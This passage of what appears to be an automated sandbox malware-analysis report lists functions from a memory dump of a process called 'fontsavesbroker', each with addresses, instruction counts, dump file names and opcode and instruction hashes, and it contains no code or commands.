                • Opcode Fuzzy Hash: 5bbb1c7557a3c8233416042de89009a4fe415be26d13c9cdb34a4febc4362da2
                • Instruction Fuzzy Hash: 85B13747B0FBDA0EE72076AC78B54F97B50DF5263270D43F7E0998A0F79C2869068291
                Function 00007FFD9B7805A0 Relevance: .3, Instructions: 317COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 169e1026a133196da420e0e221db97e6538303b943ca3aa72e9789c6d224a196
                • Instruction ID: ab982a3bafb96f41e95c59adf522d5fe10d2b5a9220b81a5ef12b1335086e05c
                • Opcode Fuzzy Hash: 169e1026a133196da420e0e221db97e6538303b943ca3aa72e9789c6d224a196
                • Instruction Fuzzy Hash: AF912A43B0FBDA0EE72166BC28B50F93B91DF5266570D43F7E0994A0F7EC2869468281
                Function 00007FFD9B78060D Relevance: .3, Instructions: 293COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 59a146d09d96d0571238dbc5999cc459a1c23e20cbc726ba430040fc8b54a8e1
                • Instruction ID: 2f20544727e28ba24b1f2f03539a9c89b3434c3773969e0e4b8310c92deaf694
                • Opcode Fuzzy Hash: 59a146d09d96d0571238dbc5999cc459a1c23e20cbc726ba430040fc8b54a8e1
                • Instruction Fuzzy Hash: EC811B43B0FBC60FE72166BC68B50F97B91DF5266170D43F7E0994A0F7DC2969468281
                Function 00007FFD9B780638 Relevance: .3, Instructions: 288COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 17db82bba05b523cbd3662c4f0e6da3453d4e21a6ea39940aac2d69346dd1ebc
                • Instruction ID: 4ec0946da176330443587abb5550b1435ebd50c463c822f8bf046b96544d7471
                • Opcode Fuzzy Hash: 17db82bba05b523cbd3662c4f0e6da3453d4e21a6ea39940aac2d69346dd1ebc
                • Instruction Fuzzy Hash: 8C814B53B0FBCA0FE72166BC68A54F97B91EF5266170D43F7E0988A0F7DC2469468381
                Function 00007FFD9B780640 Relevance: .3, Instructions: 266COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ca1e82e3d274863d105baf8d385e36fcd451fba09d29bfa63be997daa22b8a56
                • Instruction ID: f87dbc5d196bb0ec18b0001d0d51be9a1cf45e268456ef96bdd651aaa61352ab
                • Opcode Fuzzy Hash: ca1e82e3d274863d105baf8d385e36fcd451fba09d29bfa63be997daa22b8a56
                • Instruction Fuzzy Hash: E9712943B0FBC60FE72166BC28A50F97B91EF5266170D43F7E0A94A0F7EC2569068385
                Function 00007FFD9B783155 Relevance: .2, Instructions: 172COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2894be3a8bfb8bd7c284ac6f3b38ed76b4392d52e1efae01a2c48e8e108110d5
                • Instruction ID: fb8cd5d94679b80b283d12225f591aa72b9080bef58f7a70ce519eb6e0ff1534
                • Opcode Fuzzy Hash: 2894be3a8bfb8bd7c284ac6f3b38ed76b4392d52e1efae01a2c48e8e108110d5
                • Instruction Fuzzy Hash: 19510D70E09A1D8EDB54DB98C4A46EDB7F1FF54302F514279E009E72A1DB386A44CB50
                Function 00007FFD9B7A0D13 Relevance: .1, Instructions: 147COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7ac847658774062b4a87d906aabdabf286cc52ea0a24687a722c4c125035a953
                • Instruction ID: 1e980de1222fba9cde66f03c4a350554fbf1b0f682c37567f4765110e4752116
                • Opcode Fuzzy Hash: 7ac847658774062b4a87d906aabdabf286cc52ea0a24687a722c4c125035a953
                • Instruction Fuzzy Hash: 0541C774E0861C8FDB94EF58C894BE9B7B1FB59300F1092AAD40DE3251DB35AA84CF41
                Function 00007FFD9B78354B Relevance: .1, Instructions: 146COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5c6edef21f32941d1c09d48ea2af98bb862a16e9ec9f4806e6c3a2939954edc5
                • Instruction ID: b1065f8689bba47e7ca07eb5f7114354c709babfa9d4cc178deb1935ee04f5dd
                • Opcode Fuzzy Hash: 5c6edef21f32941d1c09d48ea2af98bb862a16e9ec9f4806e6c3a2939954edc5
                • Instruction Fuzzy Hash: 11419371A1994E8FEB94EB6CC8A56BC7BE1FF59301F4502B9E00ED32E6DA3468018750
                Function 00007FFD9B78C83D Relevance: .1, Instructions: 145COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ceb6de9c86e8d9265d62d80b521e3924d0f68c819f9d7fec1fe2138b05a2a417
                • Instruction ID: 2ff08427f7b1ee28d14279adf017392a41b7cc9dcb019e108e57592e500d0926
                • Opcode Fuzzy Hash: ceb6de9c86e8d9265d62d80b521e3924d0f68c819f9d7fec1fe2138b05a2a417
                • Instruction Fuzzy Hash: 2E413470A09E1D8FEBA4EB58C8A47EDB7B1FF58301F1106BAD00DD72A1DE346A418B41
                Function 00007FFD9B78368E Relevance: .1, Instructions: 132COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ed193f70839e0638381feb275c69beef0ceaf67b556eb7542aa8fd1d3e4f6fc5
                • Instruction ID: abe970c3df4a813578626f84d96d804b35330ee4bd80b68d112271fa4c7b2f79
                • Opcode Fuzzy Hash: ed193f70839e0638381feb275c69beef0ceaf67b556eb7542aa8fd1d3e4f6fc5
                • Instruction Fuzzy Hash: 1141B372B1890A8EEB54DFACD8657AC7BE1EB96365F9001BAE00DC33DADBB514018740
                Function 00007FFD9B78C309 Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7542e7fb8e748c593d88adc6f835ff4a85726e5440c733be10f69c1910d90490
                • Instruction ID: fb3aeb63bbc26f01e244179fc635d0eec98ed6ec883ca7504b0792a8ba5a5677
                • Opcode Fuzzy Hash: 7542e7fb8e748c593d88adc6f835ff4a85726e5440c733be10f69c1910d90490
                • Instruction Fuzzy Hash: F531EE70E1DE1D8FEBA4EBA8D4A56ACB7B1FF59301F510239D00DD32A2DE3469428B40
                Function 00007FFD9B78C9BD Relevance: .1, Instructions: 100COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ff855c4ed61086d2cf1f09df1dc8eb6df12a442fda84820123034536b8652dc6
                • Instruction ID: 21d9f6fe52534687c82fbb4e623f02295375a22693cba2457d4fbf3a49a8afce
                • Opcode Fuzzy Hash: ff855c4ed61086d2cf1f09df1dc8eb6df12a442fda84820123034536b8652dc6
                • Instruction Fuzzy Hash: 4231A736B4DA1B4BEB65BAF8A5654FD7350AF50326F050277E01D890F3CE3825818692
                Function 00007FFD9B78C8FD Relevance: .1, Instructions: 89COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62c6528929524d5493636fd1761660c5d17e66c0f01bed616bef65cda019887e
                • Instruction ID: 97adde44d125b933af7b1060b30c9376630f92c7d266c77578237c62d2a25442
                • Opcode Fuzzy Hash: 62c6528929524d5493636fd1761660c5d17e66c0f01bed616bef65cda019887e
                • Instruction Fuzzy Hash: 28219632A1970E8FEBA4AFB894191FE73E0FF14325F150676E45DC60A5DF34A6908A81
                Function 00007FFD9B780805 Relevance: .1, Instructions: 85COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9cd7a8eca5abb2ae3cf8bb8f4fee66a9029f17fe0186194521148e22a819574e
                • Instruction ID: 3160ba51b55060fc0c2fac5a8144c39cfa92a42739e497d591f06064fab36faa
                • Opcode Fuzzy Hash: 9cd7a8eca5abb2ae3cf8bb8f4fee66a9029f17fe0186194521148e22a819574e
                • Instruction Fuzzy Hash: 5D21C352F0FA879BD71023BCA8761E83790EF11215B094277D06DC90E3DD246157C3C1
                Function 00007FFD9B7834A5 Relevance: .1, Instructions: 83COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 49cec38284e27223908a5bb67e61b1462e8057f58db7ac6b6394aeabfeddae08
                • Instruction ID: a99ae5961dca9ae74d4115e70723ac83a3ae4eb95c537766fd53b7cdcb5975e5
                • Opcode Fuzzy Hash: 49cec38284e27223908a5bb67e61b1462e8057f58db7ac6b6394aeabfeddae08
                • Instruction Fuzzy Hash: 92218430E0AA4E8FEB65DFA884695BD77A0FF14305F0105BEE41DC61B1DB359640C740
                Function 00007FFD9B783378 Relevance: .1, Instructions: 74COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 111438a752a8d67050440fa8b6bb09cec4e54042261b722f4004c5e0ef5dd8de
                • Instruction ID: 8487057bfe6afc9b29e398af58a6ced441213312d9b28e268c972dd953a01cd1
                • Opcode Fuzzy Hash: 111438a752a8d67050440fa8b6bb09cec4e54042261b722f4004c5e0ef5dd8de
                • Instruction Fuzzy Hash: EB21A23094E78A9FD742EBB488685E97FF0EF06311B1645FBD448CB0B2DA389546C721
                Function 00007FFD9B78A5F1 Relevance: .1, Instructions: 73COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b0413daa3d0c6fbce5f0fe854b47cbe8eac0c2348892f0540b6b7ae91132a071
                • Instruction ID: e1b5b2921c8a3f8583d3646d025328414a45cf2fe74b3ba38e3ae09a9d73a7e6
                • Opcode Fuzzy Hash: b0413daa3d0c6fbce5f0fe854b47cbe8eac0c2348892f0540b6b7ae91132a071
                • Instruction Fuzzy Hash: 83216F70A09A4D8FDF94EF58C4999AD3BF0FF28305F11027AE40AD7165DB34A540CB80
                Function 00007FFD9B780F2E Relevance: .1, Instructions: 66COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 594152b9a5bb16e397f98e4ee65093dd228cc8da5bdddb2c2d2631e0bcea091b
                • Instruction ID: c2a260b4a93e149a9726eb470f7690cd3db3898ec809d9b1070f03a0ef1cc8f3
                • Opcode Fuzzy Hash: 594152b9a5bb16e397f98e4ee65093dd228cc8da5bdddb2c2d2631e0bcea091b
                • Instruction Fuzzy Hash: 0E211F31B0AA0D8BEB64EB94C8A4EED73B5EF54301F118275D40DE72A5DE34AA45CB40
                Function 00007FFD9B780A01 Relevance: .1, Instructions: 65COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ce3638e01f024ad90c516091e1dff66a147c027a6ae2b4e2b4bc615605be3d7
                • Instruction ID: 009dfeeeec5c04f58259b0c4627ec85bfcafe86fc726cc8f09b8dbae2a8eabc6
                • Opcode Fuzzy Hash: 1ce3638e01f024ad90c516091e1dff66a147c027a6ae2b4e2b4bc615605be3d7
                • Instruction Fuzzy Hash: D211A335E1AA0E4FE790EBA8C8995BD77E0FF54701F4146BAC41CC71B6DE38A5418701
                Function 00007FFD9B78121D Relevance: .1, Instructions: 58COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 31bb91a89b2a4aa37d96d329557f0190d4bb9e63eb18d13b92c0d335f1e98594
                • Instruction ID: bd08b59c33dd620cf7e02099587e94f1b3586a5e44a711c3283a768bbbe1a522
                • Opcode Fuzzy Hash: 31bb91a89b2a4aa37d96d329557f0190d4bb9e63eb18d13b92c0d335f1e98594
                • Instruction Fuzzy Hash: 9C11B671B0AA4E4EDB95EBA884B96F937A0EF59311F05057EC419CB4F2DA346601C700
                Function 00007FFD9B781F49 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7ee56e7a7c855ec480ee8b5da7b588a6b67e4c9e42486fe6f526400ca769ee97
                • Instruction ID: e5542a32de94207325f3b88e7fecb323dfcfea97a18b4be63ac193b195167f6f
                • Opcode Fuzzy Hash: 7ee56e7a7c855ec480ee8b5da7b588a6b67e4c9e42486fe6f526400ca769ee97
                • Instruction Fuzzy Hash: 1311A120A4F7C64EDB2257A844B04607FE49F07215B2E46FAD0D8CA4F3DA2C5E8AC312
                Function 00007FFD9B78CE30 Relevance: .1, Instructions: 57COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c0aba59adad01b5a761cca7f0acb3640fb7aaf5941ee05de6839c149d0deac08
                • Instruction ID: 45b9359d18f5cc341c46d22732f7299f4db9e7e814f1966bd53e6475a5452a66
                • Opcode Fuzzy Hash: c0aba59adad01b5a761cca7f0acb3640fb7aaf5941ee05de6839c149d0deac08
                • Instruction Fuzzy Hash: 76119430A09A0E9FEB58EFA8C4696BD76E1FF58341F11067ED41DC21B5DE34A550C740
                Function 00007FFD9B78CA40 Relevance: .1, Instructions: 56COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b5ea40f0d93cb04b7194676a5645d40cfd3aec54b410b644a2e384e193ee46a
                • Instruction ID: 5926f2d95b0cac9c77b37bd3f9fc0727653e5106732b3b3ba9ac3816bf8b22c4
                • Opcode Fuzzy Hash: 8b5ea40f0d93cb04b7194676a5645d40cfd3aec54b410b644a2e384e193ee46a
                • Instruction Fuzzy Hash: 56117030A09A0E8FDB54EBB4D4A95B977A0FF14301F15057ED41DC70A2DE346550C740
                Function 00007FFD9B78BD35 Relevance: .1, Instructions: 53COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4fdac2ea243e1bff63edd44240dc14cd901bd006832010bcba09838716cd4806
                • Instruction ID: 7411270e7ffbd0dbfb4857ee2979061fe7918fdfb59d519cbb1b209113cf1674
                • Opcode Fuzzy Hash: 4fdac2ea243e1bff63edd44240dc14cd901bd006832010bcba09838716cd4806
                • Instruction Fuzzy Hash: 26116131A0AA4E9FDB94EF64C4A96BD7BE1FF14301F1509BEC419C71B2DA356640C710
                Function 00007FFD9B7805D8 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0428aa7d5ffca10b7564aa7c0ef8cefbb1829796aae90085cbe22623e49dd00c
                • Instruction ID: 283e98f1692ab6399302431e5b2c95bb7b7cf9867481484e52e8bcef6e50ed06
                • Opcode Fuzzy Hash: 0428aa7d5ffca10b7564aa7c0ef8cefbb1829796aae90085cbe22623e49dd00c
                • Instruction Fuzzy Hash: 64018030A05A0E8EDB58EF65C0A56B977A1FF58306F11057AD41EC35E5CA31A650C740
                Function 00007FFD9B78AF18 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 62ee937e51f3e07d249109ff4d783cee4b4fa14276fcf08a1bc60646fa3cbd8e
                • Instruction ID: 476ea606d3f197495a59d61d14e9526c1a594d9800851b2a74c4a79ca12942b1
                • Opcode Fuzzy Hash: 62ee937e51f3e07d249109ff4d783cee4b4fa14276fcf08a1bc60646fa3cbd8e
                • Instruction Fuzzy Hash: 60014C70E15A0E8EEB55EBA4D4A86B976A0FF18306F11097AE81AD21A4DE3066508700
                Function 00007FFD9B782E65 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02b37cf07661dced2d40a7624befea9a636c96e8b62e8568968e344656e2a56
                • Instruction ID: 271303857de9f89e51cf35cda1a14b4e5f8467efc0c5f8d9333750bea28b22db
                • Opcode Fuzzy Hash: b02b37cf07661dced2d40a7624befea9a636c96e8b62e8568968e344656e2a56
                • Instruction Fuzzy Hash: FC01A230E1E64E8FE791EBA4C4A99A93BE0EF19302F0655BAC40CC70B6DB38E544C710
                Function 00007FFD9B790EA0 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1c455a880ab256d6e72d7028f2aef16a76b559675cbdced5cf80ae0f542f3b79
                • Instruction ID: 3bcec0b4e50bea2ad5263caa9c5da7c89b06f376c95b56766dbfa72852cffc77
                • Opcode Fuzzy Hash: 1c455a880ab256d6e72d7028f2aef16a76b559675cbdced5cf80ae0f542f3b79
                • Instruction Fuzzy Hash: 31011A30A15A0E8EEB94FBA4D4686BE76E1FF28305F11057AD41ED21A5DB31A650CB40
                Function 00007FFD9B781BF1 Relevance: .0, Instructions: 45COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 57d89708434cb92abbbb1fcf7fbd6943fa329b6f0efc8e531de8a1c2df362836
                • Instruction ID: 34e3f642b026df572f0b6fba3045431150c028b92de41d0214ff6309fa860402
                • Opcode Fuzzy Hash: 57d89708434cb92abbbb1fcf7fbd6943fa329b6f0efc8e531de8a1c2df362836
                • Instruction Fuzzy Hash: 7A01F970A0AB8E8FDB64DF6484655B97BA1FF59302F45017AD40CC74F1DB359550C740
                Function 00007FFD9B7827CD Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a33bbc6263d334152b6efdcd57483e7444f0596fe2e96307ed20834e9d189b8
                • Instruction ID: 47cc8e71a8e29cc35ccf228c9e5b974016907f7f35fc227ec58797072316cabc
                • Opcode Fuzzy Hash: 5a33bbc6263d334152b6efdcd57483e7444f0596fe2e96307ed20834e9d189b8
                • Instruction Fuzzy Hash: 6201FC31E0AA4E4FEB61EBA4949D5B97BE0FF15302F0205B6D408C70B5DB34E5448740
                Function 00007FFD9B790E81 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4f6c119b8def33dc3843c0d92e68838c7250d0c41ab0634a38b357019254a410
                • Instruction ID: 1e65e223dfb57ad0c3e37f133e9aec647f78ccf160957b5dd6436f99d87804e9
                • Opcode Fuzzy Hash: 4f6c119b8def33dc3843c0d92e68838c7250d0c41ab0634a38b357019254a410
                • Instruction Fuzzy Hash: 93F08C31A1AB9E8FEB94AF6498282FE3BE0FF15205F41057AE818C20A1DB345654C740
                Function 00007FFD9B78ABA5 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5bb41cb802b51d912ec696100310898696d0ebeb9bb37f41736d6d48ba7c3a4f
                • Instruction ID: 6fcf619138b72d7531704eebec5cb3f855f8ff3feee34443546f5a3574e98954
                • Opcode Fuzzy Hash: 5bb41cb802b51d912ec696100310898696d0ebeb9bb37f41736d6d48ba7c3a4f
                • Instruction Fuzzy Hash: A7018F35A0E74A4FD312EB6898E58E93BB1EF5531171646F3C108CB0B3EE38A4448710
                Function 00007FFD9B78AB39 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1b1c5e6571f724889a64df6522f8ee519ab1984cbdc1225a03f952faaa28b393
                • Instruction ID: bb3477dab81f2af78a628d8f37118a55aadd068d13ca89100967e14332c5a04d
                • Opcode Fuzzy Hash: 1b1c5e6571f724889a64df6522f8ee519ab1984cbdc1225a03f952faaa28b393
                • Instruction Fuzzy Hash: 46014831A5EB4D4FD752AB7488A95A97FF1EF15301F0605F6D408C70B6EA74A5448701
                Function 00007FFD9B78B0C8 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8e2ea3eb3524df938d770dfa9c6e428629301c7d7339c857641fa52facc27f79
                • Instruction ID: cbcb758db4cac9e9fe6113e221144dbf2298ced579e108aa617ca06680a87a2d
                • Opcode Fuzzy Hash: 8e2ea3eb3524df938d770dfa9c6e428629301c7d7339c857641fa52facc27f79
                • Instruction Fuzzy Hash: BA014B30E1AA0E8EE791EB6884D96A977E0EF19301F1155B9D81CC72B6DE34B6448600
                Function 00007FFD9B782ED9 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
